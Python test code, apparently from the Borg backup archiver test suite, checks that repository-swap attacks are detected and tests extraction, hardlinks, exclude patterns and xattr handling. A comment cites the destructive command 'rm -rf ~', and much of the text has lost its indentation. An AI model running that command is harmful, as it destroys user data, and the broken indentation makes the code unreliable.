    """Swapping in an unencrypted repo that reuses the old repo id is detected."""
    self.create_test_files()
    os.environ['BORG_PASSPHRASE'] = 'passphrase'
    repo = self.repository_location
    self.cmd('init', '--encryption=repokey', repo)
    repository_id = self._extract_repository_id(self.repository_path)
    self.cmd('create', repo + '::test', 'input')
    # replace the encrypted repo by a fresh unencrypted one with the same id
    shutil.rmtree(self.repository_path)
    self.cmd('init', '--encryption=none', repo)
    self._set_repository_id(self.repository_path, repository_id)
    self.assert_equal(repository_id, self._extract_repository_id(self.repository_path))
    # the cache remembers the encryption method; access must be aborted
    if self.FORK_DEFAULT:
        self.cmd('create', repo + '::test.2', 'input', exit_code=EXIT_ERROR)
    else:
        with pytest.raises(Cache.EncryptionMethodMismatch):
            self.cmd('create', repo + '::test.2', 'input')
def test_repository_swap_detection2(self):
    """Renaming an unencrypted repo over an encrypted one is detected."""
    self.create_test_files()
    unenc_loc = self.repository_location + '_unencrypted'
    enc_loc = self.repository_location + '_encrypted'
    self.cmd('init', '--encryption=none', unenc_loc)
    os.environ['BORG_PASSPHRASE'] = 'passphrase'
    self.cmd('init', '--encryption=repokey', enc_loc)
    self.cmd('create', enc_loc + '::test', 'input')
    # swap: place the unencrypted repo where the encrypted one used to live
    shutil.rmtree(self.repository_path + '_encrypted')
    os.rename(self.repository_path + '_unencrypted', self.repository_path + '_encrypted')
    if self.FORK_DEFAULT:
        self.cmd('create', enc_loc + '::test.2', 'input', exit_code=EXIT_ERROR)
    else:
        with pytest.raises(Cache.RepositoryAccessAborted):
            self.cmd('create', enc_loc + '::test.2', 'input')
def test_repository_swap_detection_no_cache(self):
    """Same swap scenario as test_repository_swap_detection, but without a local cache."""
    self.create_test_files()
    os.environ['BORG_PASSPHRASE'] = 'passphrase'
    repo = self.repository_location
    self.cmd('init', '--encryption=repokey', repo)
    repository_id = self._extract_repository_id(self.repository_path)
    self.cmd('create', repo + '::test', 'input')
    # replace the encrypted repo by an unencrypted one with the same id
    shutil.rmtree(self.repository_path)
    self.cmd('init', '--encryption=none', repo)
    self._set_repository_id(self.repository_path, repository_id)
    self.assert_equal(repository_id, self._extract_repository_id(self.repository_path))
    # drop the cache so detection must work from the security dir alone
    self.cmd('delete', '--cache-only', repo)
    if self.FORK_DEFAULT:
        self.cmd('create', repo + '::test.2', 'input', exit_code=EXIT_ERROR)
    else:
        with pytest.raises(Cache.EncryptionMethodMismatch):
            self.cmd('create', repo + '::test.2', 'input')
def test_repository_swap_detection2_no_cache(self):
    """Same rename-swap scenario as test_repository_swap_detection2, without caches."""
    self.create_test_files()
    unenc_loc = self.repository_location + '_unencrypted'
    enc_loc = self.repository_location + '_encrypted'
    self.cmd('init', '--encryption=none', unenc_loc)
    os.environ['BORG_PASSPHRASE'] = 'passphrase'
    self.cmd('init', '--encryption=repokey', enc_loc)
    self.cmd('create', enc_loc + '::test', 'input')
    # wipe both caches before swapping the repositories
    self.cmd('delete', '--cache-only', unenc_loc)
    self.cmd('delete', '--cache-only', enc_loc)
    shutil.rmtree(self.repository_path + '_encrypted')
    os.rename(self.repository_path + '_unencrypted', self.repository_path + '_encrypted')
    if self.FORK_DEFAULT:
        self.cmd('create', enc_loc + '::test.2', 'input', exit_code=EXIT_ERROR)
    else:
        with pytest.raises(Cache.RepositoryAccessAborted):
            self.cmd('create', enc_loc + '::test.2', 'input')
def test_repository_swap_detection_repokey_blank_passphrase(self):
    """A swapped-in repokey repo with a blank passphrase must not be trusted silently."""
    # Check that a repokey repo with a blank passphrase is considered like a plaintext repo.
    self.create_test_files()
    # User initializes her repository with her passphrase
    self.cmd('init', '--encryption=repokey', self.repository_location)
    self.cmd('create', self.repository_location + '::test', 'input')
    # Attacker replaces it with her own repository, which is encrypted but has no passphrase set
    shutil.rmtree(self.repository_path)
    with environment_variable(BORG_PASSPHRASE=''):
        self.cmd('init', '--encryption=repokey', self.repository_location)
    # Delete cache & security database, AKA switch to user perspective
    self.cmd('delete', '--cache-only', self.repository_location)
    repository_id = bin_to_hex(self._extract_repository_id(self.repository_path))
    shutil.rmtree(get_security_dir(repository_id))
    with environment_variable(BORG_PASSPHRASE=None):
        # This is the part were the user would be tricked, e.g. she assumes that BORG_PASSPHRASE
        # is set, while it isn't. Previously this raised no warning,
        # since the repository is, technically, encrypted.
        if self.FORK_DEFAULT:
            self.cmd('create', self.repository_location + '::test.2', 'input', exit_code=EXIT_ERROR)
        else:
            with pytest.raises(Cache.CacheInitAbortedError):
                self.cmd('create', self.repository_location + '::test.2', 'input')
def test_repository_move(self):
    """A relocated repo needs one confirmation; security dir entries are rewritten."""
    self.cmd('init', '--encryption=repokey', self.repository_location)
    repository_id = bin_to_hex(self._extract_repository_id(self.repository_path))
    os.rename(self.repository_path, self.repository_path + '_new')
    # first access after the move requires explicit confirmation
    with environment_variable(BORG_RELOCATED_REPO_ACCESS_IS_OK='yes'):
        self.cmd('info', self.repository_location + '_new')
    security_dir = get_security_dir(repository_id)
    with open(os.path.join(security_dir, 'location')) as fd:
        location = fd.read()
        assert location == Location(self.repository_location + '_new').canonical_path()
    # Needs no confirmation anymore
    self.cmd('info', self.repository_location + '_new')
    shutil.rmtree(self.cache_path)
    self.cmd('info', self.repository_location + '_new')
    shutil.rmtree(security_dir)
    self.cmd('info', self.repository_location + '_new')
    # the "info" above recreated the security dir entries
    for file in ('location', 'key-type', 'manifest-timestamp'):
        assert os.path.exists(os.path.join(security_dir, file))
def test_security_dir_compat(self):
    """An outdated 'location' entry in the security dir is tolerated."""
    self.cmd('init', '--encryption=repokey', self.repository_location)
    repo_id = bin_to_hex(self._extract_repository_id(self.repository_path))
    with open(os.path.join(get_security_dir(repo_id), 'location'), 'w') as fd:
        fd.write('something outdated')
    # This is fine, because the cache still has the correct information. security_dir and cache can disagree
    # if older versions are used to confirm a renamed repository.
    self.cmd('info', self.repository_location)
def test_unknown_unencrypted(self):
    """Access to an unknown unencrypted repo requires explicit confirmation."""
    self.cmd('init', '--encryption=none', self.repository_location)
    repo_id = bin_to_hex(self._extract_repository_id(self.repository_path))
    security_dir = get_security_dir(repo_id)
    # Ok: repository is known (via cache)
    self.cmd('info', self.repository_location)
    # Ok: cache is gone, but the repo is still known through the security dir
    shutil.rmtree(self.cache_path)
    self.cmd('info', self.repository_location)
    # both cache and security dir gone (e.g. another host or rm -rf ~): needs confirmation
    shutil.rmtree(self.cache_path)
    shutil.rmtree(security_dir)
    if self.FORK_DEFAULT:
        self.cmd('info', self.repository_location, exit_code=EXIT_ERROR)
    else:
        with pytest.raises(Cache.CacheInitAbortedError):
            self.cmd('info', self.repository_location)
    with environment_variable(BORG_UNKNOWN_UNENCRYPTED_REPO_ACCESS_IS_OK='yes'):
        self.cmd('info', self.repository_location)
def test_strip_components(self):
    """--strip-components drops leading path elements when extracting."""
    self.cmd('init', '--encryption=repokey', self.repository_location)
    self.create_regular_file('dir/file')
    self.cmd('create', self.repository_location + '::test', 'input')
    with changedir('output'):
        # stripping more components than the path has extracts nothing
        self.cmd('extract', self.repository_location + '::test', '--strip-components', '3')
        self.assert_true(not os.path.exists('file'))
        # each lower strip level keeps one more leading path element
        for strip, created in (('2', 'file'), ('1', 'dir/file'), ('0', 'input/dir/file')):
            with self.assert_creates_file(created):
                self.cmd('extract', self.repository_location + '::test', '--strip-components', strip)
def _extract_hardlinks_setup(self):
    """Build an input tree with two hardlink groups and archive it as ::test."""
    os.mkdir(os.path.join(self.input_path, 'dir1'))
    os.mkdir(os.path.join(self.input_path, 'dir1/subdir'))
    # group 1: 'source' with three additional links at different depths
    self.create_regular_file('source', contents=b'123456')
    for link_name in ('abba', 'dir1/hardlink', 'dir1/subdir/hardlink'):
        os.link(os.path.join(self.input_path, 'source'),
                os.path.join(self.input_path, link_name))
    # group 2: 'dir1/source2' with one additional link
    self.create_regular_file('dir1/source2')
    os.link(os.path.join(self.input_path, 'dir1/source2'),
            os.path.join(self.input_path, 'dir1/aaaa'))
    self.cmd('init', '--encryption=repokey', self.repository_location)
    self.cmd('create', self.repository_location + '::test', 'input')
# class-level skip marker for tests that need working hardlinks on the test filesystem
requires_hardlinks = pytest.mark.skipif(not are_hardlinks_supported(), reason='hardlinks not supported')
@requires_hardlinks
@unittest.skipUnless(has_llfuse, 'llfuse not installed')
def test_mount_hardlinks(self):
    """Hardlink counts and contents are correct through a FUSE mount (full + partial)."""
    self._extract_hardlinks_setup()
    mountpoint = os.path.join(self.tmpdir, 'mountpoint')
    # we need to get rid of permissions checking because fakeroot causes issues with it.
    # On all platforms, borg defaults to "default_permissions" and we need to get rid of it via "ignore_permissions".
    # On macOS (darwin), we additionally need "defer_permissions" to switch off the checks in osxfuse.
    if sys.platform == 'darwin':
        ignore_perms = ['-o', 'ignore_permissions,defer_permissions']
    else:
        ignore_perms = ['-o', 'ignore_permissions']
    # partial mount with stripped components: only the dir1 subtree group (nlink 2)
    with self.fuse_mount(self.repository_location + '::test', mountpoint, '--strip-components=2', *ignore_perms), \
            changedir(mountpoint):
        assert os.stat('hardlink').st_nlink == 2
        assert os.stat('subdir/hardlink').st_nlink == 2
        assert open('subdir/hardlink', 'rb').read() == b'123456'
        assert os.stat('aaaa').st_nlink == 2
        assert os.stat('source2').st_nlink == 2
    # partial mount restricted to input/dir1
    with self.fuse_mount(self.repository_location + '::test', mountpoint, 'input/dir1', *ignore_perms), \
            changedir(mountpoint):
        assert os.stat('input/dir1/hardlink').st_nlink == 2
        assert os.stat('input/dir1/subdir/hardlink').st_nlink == 2
        assert open('input/dir1/subdir/hardlink', 'rb').read() == b'123456'
        assert os.stat('input/dir1/aaaa').st_nlink == 2
        assert os.stat('input/dir1/source2').st_nlink == 2
    # full mount: the 4-member hardlink group is complete
    with self.fuse_mount(self.repository_location + '::test', mountpoint, *ignore_perms), \
            changedir(mountpoint):
        assert os.stat('input/source').st_nlink == 4
        assert os.stat('input/abba').st_nlink == 4
        assert os.stat('input/dir1/hardlink').st_nlink == 4
        assert os.stat('input/dir1/subdir/hardlink').st_nlink == 4
        assert open('input/dir1/subdir/hardlink', 'rb').read() == b'123456'
@requires_hardlinks
def test_extract_hardlinks(self):
    """Extracted hardlink groups keep their link counts and content."""
    self._extract_hardlinks_setup()
    # stripped-component extract: the dir1 subtree groups (2 links each)
    with changedir('output'):
        self.cmd('extract', self.repository_location + '::test', '--strip-components', '2')
        for path in ('hardlink', 'subdir/hardlink', 'aaaa', 'source2'):
            assert os.stat(path).st_nlink == 2
        with open('subdir/hardlink', 'rb') as fd:
            assert fd.read() == b'123456'
    # partial extract of input/dir1 only
    with changedir('output'):
        self.cmd('extract', self.repository_location + '::test', 'input/dir1')
        for path in ('input/dir1/hardlink', 'input/dir1/subdir/hardlink',
                     'input/dir1/aaaa', 'input/dir1/source2'):
            assert os.stat(path).st_nlink == 2
        with open('input/dir1/subdir/hardlink', 'rb') as fd:
            assert fd.read() == b'123456'
    # full extract: the 4-member hardlink group is complete
    with changedir('output'):
        self.cmd('extract', self.repository_location + '::test')
        for path in ('input/source', 'input/abba', 'input/dir1/hardlink',
                     'input/dir1/subdir/hardlink'):
            assert os.stat(path).st_nlink == 4
        with open('input/dir1/subdir/hardlink', 'rb') as fd:
            assert fd.read() == b'123456'
def test_extract_include_exclude(self):
    """Excludes at create time and extract time both limit what lands on disk."""
    self.cmd('init', '--encryption=repokey', self.repository_location)
    for name in ('file1', 'file2', 'file3', 'file4'):
        self.create_regular_file(name, size=1024 * 80)
    # file4 is excluded at create time and thus never enters the archive
    self.cmd('create', '--exclude=input/file4', self.repository_location + '::test', 'input')
    # extract a single item by path
    with changedir('output'):
        self.cmd('extract', self.repository_location + '::test', 'input/file1', )
    self.assert_equal(sorted(os.listdir('output/input')), ['file1'])
    # extract-time --exclude keeps file2 out (file1 is already present from above)
    with changedir('output'):
        self.cmd('extract', '--exclude=input/file2', self.repository_location + '::test')
    self.assert_equal(sorted(os.listdir('output/input')), ['file1', 'file3'])
    # same result via --exclude-from
    with changedir('output'):
        self.cmd('extract', '--exclude-from=' + self.exclude_file_path, self.repository_location + '::test')
    self.assert_equal(sorted(os.listdir('output/input')), ['file1', 'file3'])
def test_extract_include_exclude_regex(self):
    """Regex (re:) and fnmatch excludes work at create and extract time."""
    self.cmd('init', '--encryption=repokey', self.repository_location)
    for name in ('file1', 'file2', 'file3', 'file4', 'file333'):
        self.create_regular_file(name, size=1024 * 80)
    # Create with regular expression exclusion for file4
    self.cmd('create', '--exclude=re:input/file4$', self.repository_location + '::test', 'input')

    def extract_and_check(expected, *extra_args):
        # run one extraction with the given extra args and verify the listing
        with changedir('output'):
            self.cmd('extract', *extra_args, self.repository_location + '::test')
        self.assert_equal(sorted(os.listdir('output/input')), expected)

    extract_and_check(['file1', 'file2', 'file3', 'file333'])
    shutil.rmtree('output/input')
    # Extract with regular expression exclusion
    extract_and_check(['file1', 'file2'], '--exclude=re:file3+')
    shutil.rmtree('output/input')
    # Combine --exclude with fnmatch and regular expression
    extract_and_check(['file3', 'file333'], '--exclude=input/file2', '--exclude=re:file[01]')
    shutil.rmtree('output/input')
    # Combine --exclude-from and regular expression exclusion
    extract_and_check(['file3'], '--exclude-from=' + self.exclude_file_path,
                      '--exclude=re:file1', '--exclude=re:file(\\d)\\1\\1$')
def test_extract_include_exclude_regex_from_file(self):
    """Pattern files (--exclude-from) accept re:, fm: and shell-style lines."""
    self.cmd('init', '--encryption=repokey', self.repository_location)
    for name in ('file1', 'file2', 'file3', 'file4', 'file333', 'aa:something'):
        self.create_regular_file(name, size=1024 * 80)
    # Create while excluding using mixed pattern styles
    with open(self.exclude_file_path, 'wb') as fd:
        fd.write(b're:input/file4$\n')
        fd.write(b'fm:*aa:*thing\n')
    self.cmd('create', '--exclude-from=' + self.exclude_file_path, self.repository_location + '::test', 'input')
    with changedir('output'):
        self.cmd('extract', self.repository_location + '::test')
    self.assert_equal(sorted(os.listdir('output/input')), ['file1', 'file2', 'file3', 'file333'])
    shutil.rmtree('output/input')
    # Exclude using regular expression from file
    with open(self.exclude_file_path, 'wb') as fd:
        fd.write(b're:file3+\n')
    with changedir('output'):
        self.cmd('extract', '--exclude-from=' + self.exclude_file_path, self.repository_location + '::test')
    self.assert_equal(sorted(os.listdir('output/input')), ['file1', 'file2'])
    shutil.rmtree('output/input')
    # Mixed exclude pattern styles in a single file
    with open(self.exclude_file_path, 'wb') as fd:
        fd.write(b're:file(\\d)\\1\\1$\n')
        fd.write(b'fm:nothingwillmatchthis\n')
        fd.write(b'*/file1\n')
        fd.write(b're:file2$\n')
    with changedir('output'):
        self.cmd('extract', '--exclude-from=' + self.exclude_file_path, self.repository_location + '::test')
    self.assert_equal(sorted(os.listdir('output/input')), ['file3'])
def test_extract_with_pattern(self):
    """Positional extract patterns select items; --exclude still applies on top."""
    self.cmd('init', '--encryption=repokey', self.repository_location)
    for name in ('file1', 'file2', 'file3', 'file4', 'file333'):
        self.create_regular_file(name, size=1024 * 80)
    self.cmd('create', self.repository_location + '::test', 'input')
    # a match-all regular expression extracts everything
    with changedir('output'):
        self.cmd('extract', self.repository_location + '::test', 're:.*')
    self.assert_equal(sorted(os.listdir('output/input')), ['file1', 'file2', 'file3', 'file333', 'file4'])
    shutil.rmtree('output/input')
    # pattern combined with --exclude
    with changedir('output'):
        self.cmd('extract', '--exclude=re:file[34]$', self.repository_location + '::test', r're:file\d$')
    self.assert_equal(sorted(os.listdir('output/input')), ['file1', 'file2'])
    shutil.rmtree('output/input')
    # --exclude wins over an otherwise matching pattern
    with changedir('output'):
        self.cmd('extract', '--exclude=input/file1', self.repository_location + '::test', 're:file[12]$')
    self.assert_equal(sorted(os.listdir('output/input')), ['file2'])
    shutil.rmtree('output/input')
    # several patterns of different styles can be combined
    with changedir('output'):
        self.cmd('extract', self.repository_location + '::test', 'fm:input/file1', 'fm:*file33*', 'input/file2')
    self.assert_equal(sorted(os.listdir('output/input')), ['file1', 'file2', 'file333'])
def test_extract_list_output(self):
    """Extract prints per-file names only when --list is given (with or without --info)."""
    self.cmd('init', '--encryption=repokey', self.repository_location)
    self.create_regular_file('file', size=1024 * 80)
    self.cmd('create', self.repository_location + '::test', 'input')
    # (flags, whether the extracted file name should appear in the output)
    cases = (
        ((), False),
        (('--info',), False),
        (('--list',), True),
        (('--list', '--info'), True),
    )
    for idx, (flags, listed) in enumerate(cases):
        with changedir('output'):
            output = self.cmd('extract', *flags, self.repository_location + '::test')
        if listed:
            self.assert_in("input/file", output)
        else:
            self.assert_not_in("input/file", output)
        if idx < len(cases) - 1:
            # clean up so the next extraction starts from an empty dir
            shutil.rmtree('output/input')
def test_extract_progress(self):
    """extract --progress emits 'Extracting:' progress output."""
    self.cmd('init', '--encryption=repokey', self.repository_location)
    self.create_regular_file('file', size=1024 * 80)
    self.cmd('create', self.repository_location + '::test', 'input')
    with changedir('output'):
        progress_output = self.cmd('extract', self.repository_location + '::test', '--progress')
        assert 'Extracting:' in progress_output
def _create_test_caches(self):
    """Set up input with cache-tagged dirs: valid tag (+extra data), bogus tag, hardlinked tag."""
    self.cmd('init', '--encryption=repokey', self.repository_location)
    self.create_regular_file('file1', size=1024 * 80)
    # cache1: valid CACHEDIR.TAG signature with trailing extra data
    self.create_regular_file('cache1/%s' % CACHE_TAG_NAME,
                             contents=CACHE_TAG_CONTENTS + b' extra stuff')
    # cache2: tag file with a bogus signature
    self.create_regular_file('cache2/%s' % CACHE_TAG_NAME,
                             contents=b'invalid signature')
    os.mkdir('input/cache3')
    # cache3: hardlink to the valid tag file in cache1
    os.link('input/cache1/%s' % CACHE_TAG_NAME, 'input/cache3/%s' % CACHE_TAG_NAME)
def test_create_stdin(self):
    """Data piped to 'create -' becomes an archive item named 'stdin', owned by root."""
    self.cmd('init', '--encryption=repokey', self.repository_location)
    input_data = b'\x00foo\n\nbar\n \n'
    self.cmd('create', self.repository_location + '::test', '-', input=input_data)
    item = json.loads(self.cmd('list', '--json-lines', self.repository_location + '::test'))
    assert item['uid'] == 0
    assert item['gid'] == 0
    assert item['size'] == len(input_data)
    assert item['path'] == 'stdin'
    # round trip: the extracted stream equals what was fed in
    round_tripped = self.cmd('extract', '--stdout', self.repository_location + '::test', binary_output=True)
    assert round_tripped == input_data
def test_create_without_root(self):
    """'create' without any root path must fail with an argument error (rc 2)."""
    self.cmd('init', '--encryption=repokey', self.repository_location)
    self.cmd('create', self.repository_location + '::test', exit_code=2)
def test_create_pattern_root(self):
    """A lone root ('R') pattern selects everything below it."""
    self.cmd('init', '--encryption=repokey', self.repository_location)
    for name in ('file1', 'file2'):
        self.create_regular_file(name, size=1024 * 80)
    output = self.cmd('create', '-v', '--list', '--pattern=R input', self.repository_location + '::test')
    # both files are added ('A') by the root pattern
    for name in ('file1', 'file2'):
        self.assert_in('A input/%s' % name, output)
def test_create_pattern(self):
"""test file patterns during create"""
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_regular_file('file1', size=1024 * 80)
self.create_regular_file('file2', size=1024 * 80)
self.create_regular_file('file_important', size=1024 * 80)
output = self.cmd('create', '-v', '--list',
'--pattern=+input/file_important', '--pattern=-input/file*',
self.repository_location + '::test', 'input')
self.assert_in("A input/file_important", output)
self.assert_in('x input/file1', output)
self.assert_in('x input/file2', output)
def test_create_pattern_file(self):
"""test file patterns during create"""
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_regular_file('file1', size=1024 * 80)
self.create_regular_file('file2', size=1024 * 80)
self.create_regular_file('otherfile', size=1024 * 80)
self.create_regular_file('file_important', size=1024 * 80)
output = self.cmd('create', '-v', '--list',
'--pattern=-input/otherfile', '--patterns-from=' + self.patterns_file_path,
self.repository_location + '::test', 'input')
self.assert_in("A input/file_important", output)
self.assert_in('x input/file1', output)
self.assert_in('x input/file2', output)
self.assert_in('x input/otherfile', output)
def test_create_pattern_exclude_folder_but_recurse(self):
"""test when patterns exclude a parent folder, but include a child"""
self.patterns_file_path2 = os.path.join(self.tmpdir, 'patterns2')
with open(self.patterns_file_path2, 'wb') as fd:
fd.write(b'+ input/x/b\n- input/x*\n')
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_regular_file('x/a/foo_a', size=1024 * 80)
self.create_regular_file('x/b/foo_b', size=1024 * 80)
self.create_regular_file('y/foo_y', size=1024 * 80)
output = self.cmd('create', '-v', '--list',
'--patterns-from=' + self.patterns_file_path2,
self.repository_location + '::test', 'input')
self.assert_in('x input/x/a/foo_a', output)
self.assert_in("A input/x/b/foo_b", output)
self.assert_in('A input/y/foo_y', output)
def test_create_pattern_exclude_folder_no_recurse(self):
"""test when patterns exclude a parent folder and, but include a child"""
self.patterns_file_path2 = os.path.join(self.tmpdir, 'patterns2')
with open(self.patterns_file_path2, 'wb') as fd:
fd.write(b'+ input/x/b\n! input/x*\n')
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_regular_file('x/a/foo_a', size=1024 * 80)
self.create_regular_file('x/b/foo_b', size=1024 * 80)
self.create_regular_file('y/foo_y', size=1024 * 80)
output = self.cmd('create', '-v', '--list',
'--patterns-from=' + self.patterns_file_path2,
self.repository_location + '::test', 'input')
self.assert_not_in('input/x/a/foo_a', output)
self.assert_not_in('input/x/a', output)
self.assert_in('A input/y/foo_y', output)
def test_create_pattern_intermediate_folders_first(self):
"""test that intermediate folders appear first when patterns exclude a parent folder but include a child"""
self.patterns_file_path2 = os.path.join(self.tmpdir, 'patterns2')
with open(self.patterns_file_path2, 'wb') as fd:
fd.write(b'+ input/x/a\n+ input/x/b\n- input/x*\n')
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_regular_file('x/a/foo_a', size=1024 * 80)
self.create_regular_file('x/b/foo_b', size=1024 * 80)
with changedir('input'):
self.cmd('create', '--patterns-from=' + self.patterns_file_path2,
self.repository_location + '::test', '.')
# list the archive and verify that the "intermediate" folders appear before
# their contents
out = self.cmd('list', '--format', '{type} {path}{NL}', self.repository_location + '::test')
out_list = out.splitlines()
self.assert_in('d x/a', out_list)
self.assert_in('d x/b', out_list)
assert out_list.index('d x/a') < out_list.index('- x/a/foo_a')
assert out_list.index('d x/b') < out_list.index('- x/b/foo_b')
def test_create_no_cache_sync(self):
self.create_test_files()
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('delete', '--cache-only', self.repository_location)
create_json = json.loads(self.cmd('create', '--no-cache-sync', self.repository_location + '::test', 'input',
'--json', '--error')) # ignore experimental warning
info_json = json.loads(self.cmd('info', self.repository_location + '::test', '--json'))
create_stats = create_json['cache']['stats']
info_stats = info_json['cache']['stats']
assert create_stats == info_stats
self.cmd('delete', '--cache-only', self.repository_location)
self.cmd('create', '--no-cache-sync', self.repository_location + '::test2', 'input')
self.cmd('info', self.repository_location)
self.cmd('check', self.repository_location)
def test_extract_pattern_opt(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_regular_file('file1', size=1024 * 80)
self.create_regular_file('file2', size=1024 * 80)
self.create_regular_file('file_important', size=1024 * 80)
self.cmd('create', self.repository_location + '::test', 'input')
with changedir('output'):
self.cmd('extract',
'--pattern=+input/file_important', '--pattern=-input/file*',
self.repository_location + '::test')
self.assert_equal(sorted(os.listdir('output/input')), ['file_important'])
def _assert_test_caches(self):
with changedir('output'):
self.cmd('extract', self.repository_location + '::test')
self.assert_equal(sorted(os.listdir('output/input')), ['cache2', 'file1'])
self.assert_equal(sorted(os.listdir('output/input/cache2')), [CACHE_TAG_NAME])
def test_exclude_caches(self):
self._create_test_caches()
self.cmd('create', '--exclude-caches', self.repository_location + '::test', 'input')
self._assert_test_caches()
def test_recreate_exclude_caches(self):
self._create_test_caches()
self.cmd('create', self.repository_location + '::test', 'input')
self.cmd('recreate', '--exclude-caches', self.repository_location + '::test')
self._assert_test_caches()
    def _create_test_tagged(self):
        """Set up a repo and input dirs marked with --exclude-if-present tag files."""
        self.cmd('init', '--encryption=repokey', self.repository_location)
        self.create_regular_file('file1', size=1024 * 80)
        self.create_regular_file('tagged1/.NOBACKUP')
        self.create_regular_file('tagged2/00-NOBACKUP')
        # here the tag name is a *directory*, not a file -- still counts as present
        self.create_regular_file('tagged3/.NOBACKUP/file2', size=1024)
def _assert_test_tagged(self):
with changedir('output'):
self.cmd('extract', self.repository_location + '::test')
self.assert_equal(sorted(os.listdir('output/input')), ['file1'])
def test_exclude_tagged(self):
self._create_test_tagged()
self.cmd('create', '--exclude-if-present', '.NOBACKUP', '--exclude-if-present', '00-NOBACKUP', self.repository_location + '::test', 'input')
self._assert_test_tagged()
def test_recreate_exclude_tagged(self):
self._create_test_tagged()
self.cmd('create', self.repository_location + '::test', 'input')
self.cmd('recreate', '--exclude-if-present', '.NOBACKUP', '--exclude-if-present', '00-NOBACKUP',
self.repository_location + '::test')
self._assert_test_tagged()
    def _create_test_keep_tagged(self):
        """Set up a repo and input dirs covering all exclusion-tag kinds:
        tagged1 (.NOBACKUP1 tag file), tagged2 (.NOBACKUP2 as a directory),
        tagged3 (valid CACHEDIR.TAG), taggedall (all three combined).
        Every tagged dir also holds a payload file that exclusion should drop.
        """
        self.cmd('init', '--encryption=repokey', self.repository_location)
        self.create_regular_file('file0', size=1024)
        self.create_regular_file('tagged1/.NOBACKUP1')
        self.create_regular_file('tagged1/file1', size=1024)
        self.create_regular_file('tagged2/.NOBACKUP2/subfile1', size=1024)
        self.create_regular_file('tagged2/file2', size=1024)
        # valid cache tag signature plus trailing data -- must still be recognized
        self.create_regular_file('tagged3/%s' % CACHE_TAG_NAME,
                                 contents=CACHE_TAG_CONTENTS + b' extra stuff')
        self.create_regular_file('tagged3/file3', size=1024)
        self.create_regular_file('taggedall/.NOBACKUP1')
        self.create_regular_file('taggedall/.NOBACKUP2/subfile1', size=1024)
        self.create_regular_file('taggedall/%s' % CACHE_TAG_NAME,
                                 contents=CACHE_TAG_CONTENTS + b' extra stuff')
        self.create_regular_file('taggedall/file4', size=1024)
def _assert_test_keep_tagged(self):
with changedir('output'):
self.cmd('extract', self.repository_location + '::test')
self.assert_equal(sorted(os.listdir('output/input')), ['file0', 'tagged1', 'tagged2', 'tagged3', 'taggedall'])
self.assert_equal(os.listdir('output/input/tagged1'), ['.NOBACKUP1'])
self.assert_equal(os.listdir('output/input/tagged2'), ['.NOBACKUP2'])
self.assert_equal(os.listdir('output/input/tagged3'), [CACHE_TAG_NAME])
self.assert_equal(sorted(os.listdir('output/input/taggedall')),
['.NOBACKUP1', '.NOBACKUP2', CACHE_TAG_NAME, ])
def test_exclude_keep_tagged(self):
self._create_test_keep_tagged()
self.cmd('create', '--exclude-if-present', '.NOBACKUP1', '--exclude-if-present', '.NOBACKUP2',
'--exclude-caches', '--keep-exclude-tags', self.repository_location + '::test', 'input')
self._assert_test_keep_tagged()
def test_recreate_exclude_keep_tagged(self):
self._create_test_keep_tagged()
self.cmd('create', self.repository_location + '::test', 'input')
self.cmd('recreate', '--exclude-if-present', '.NOBACKUP1', '--exclude-if-present', '.NOBACKUP2',
'--exclude-caches', '--keep-exclude-tags', self.repository_location + '::test')
self._assert_test_keep_tagged()
    @pytest.mark.skipif(not xattr.XATTR_FAKEROOT, reason='Linux capabilities test, requires fakeroot >= 1.20.2')
    def test_extract_capabilities(self):
        """Extract must restore the security.capability xattr even though fchown() clears it."""
        fchown = os.fchown
        # We need to manually patch chown to get the behaviour Linux has, since fakeroot does not
        # accurately model the interaction of chown(2) and Linux capabilities, i.e. it does not remove them.
        def patched_fchown(fd, uid, gid):
            xattr.setxattr(fd, b'security.capability', b'', follow_symlinks=False)
            fchown(fd, uid, gid)
        # The capability descriptor used here is valid and taken from a /usr/bin/ping
        capabilities = b'\x01\x00\x00\x02\x00 \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
        self.create_regular_file('file')
        xattr.setxattr(b'input/file', b'security.capability', capabilities)
        self.cmd('init', '--encryption=repokey', self.repository_location)
        self.cmd('create', self.repository_location + '::test', 'input')
        with changedir('output'):
            with patch.object(os, 'fchown', patched_fchown):
                self.cmd('extract', self.repository_location + '::test')
            # 'input/file' here is relative to the 'output' cwd, i.e. the extracted copy
            assert xattr.getxattr(b'input/file', b'security.capability') == capabilities
@pytest.mark.skipif(not xattr.XATTR_FAKEROOT, reason='xattr not supported on this system or on this version of'
'fakeroot')
def test_extract_xattrs_errors(self):
def patched_setxattr_E2BIG(*args, **kwargs):
raise OSError(errno.E2BIG, 'E2BIG')
def patched_setxattr_ENOTSUP(*args, **kwargs):
raise OSError(errno.ENOTSUP, 'ENOTSUP')
def patched_setxattr_EACCES(*args, **kwargs):
raise OSError(errno.EACCES, 'EACCES')
self.create_regular_file('file')
xattr.setxattr(b'input/file', b'user.attribute', b'value')
self.cmd('init', self.repository_location, '-e' 'none')
self.cmd('create', self.repository_location + '::test', 'input')
with changedir('output'):
input_abspath = os.path.abspath('input/file')
with patch.object(xattr, 'setxattr', patched_setxattr_E2BIG):
out = self.cmd('extract', self.repository_location + '::test', exit_code=EXIT_WARNING)
assert '>: Value or key of extended attribute user.attribute is too big for this filesystem\n' in out
os.remove(input_abspath)
with patch.object(xattr, 'setxattr', patched_setxattr_ENOTSUP):
out = self.cmd('extract', self.repository_location + '::test', exit_code=EXIT_WARNING)
assert '>: Extended attributes are not supported on this filesystem\n' in out
os.remove(input_abspath)
with patch.object(xattr, 'setxattr', patched_setxattr_EACCES):
out = self.cmd('extract', self.repository_location + '::test', exit_code=EXIT_WARNING)
assert '>: Permission denied when setting extended attribute user.attribute\n' in out
assert os.path.isfile(input_abspath)
def test_path_normalization(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_regular_file('dir1/dir2/file', size=1024 * 80)
with changedir('input/dir1/dir2'):
self.cmd('create', self.repository_location + '::test', '../../../input/dir1/../dir1/dir2/..')
output = self.cmd('list', self.repository_location + '::test')
self.assert_not_in('..', output)
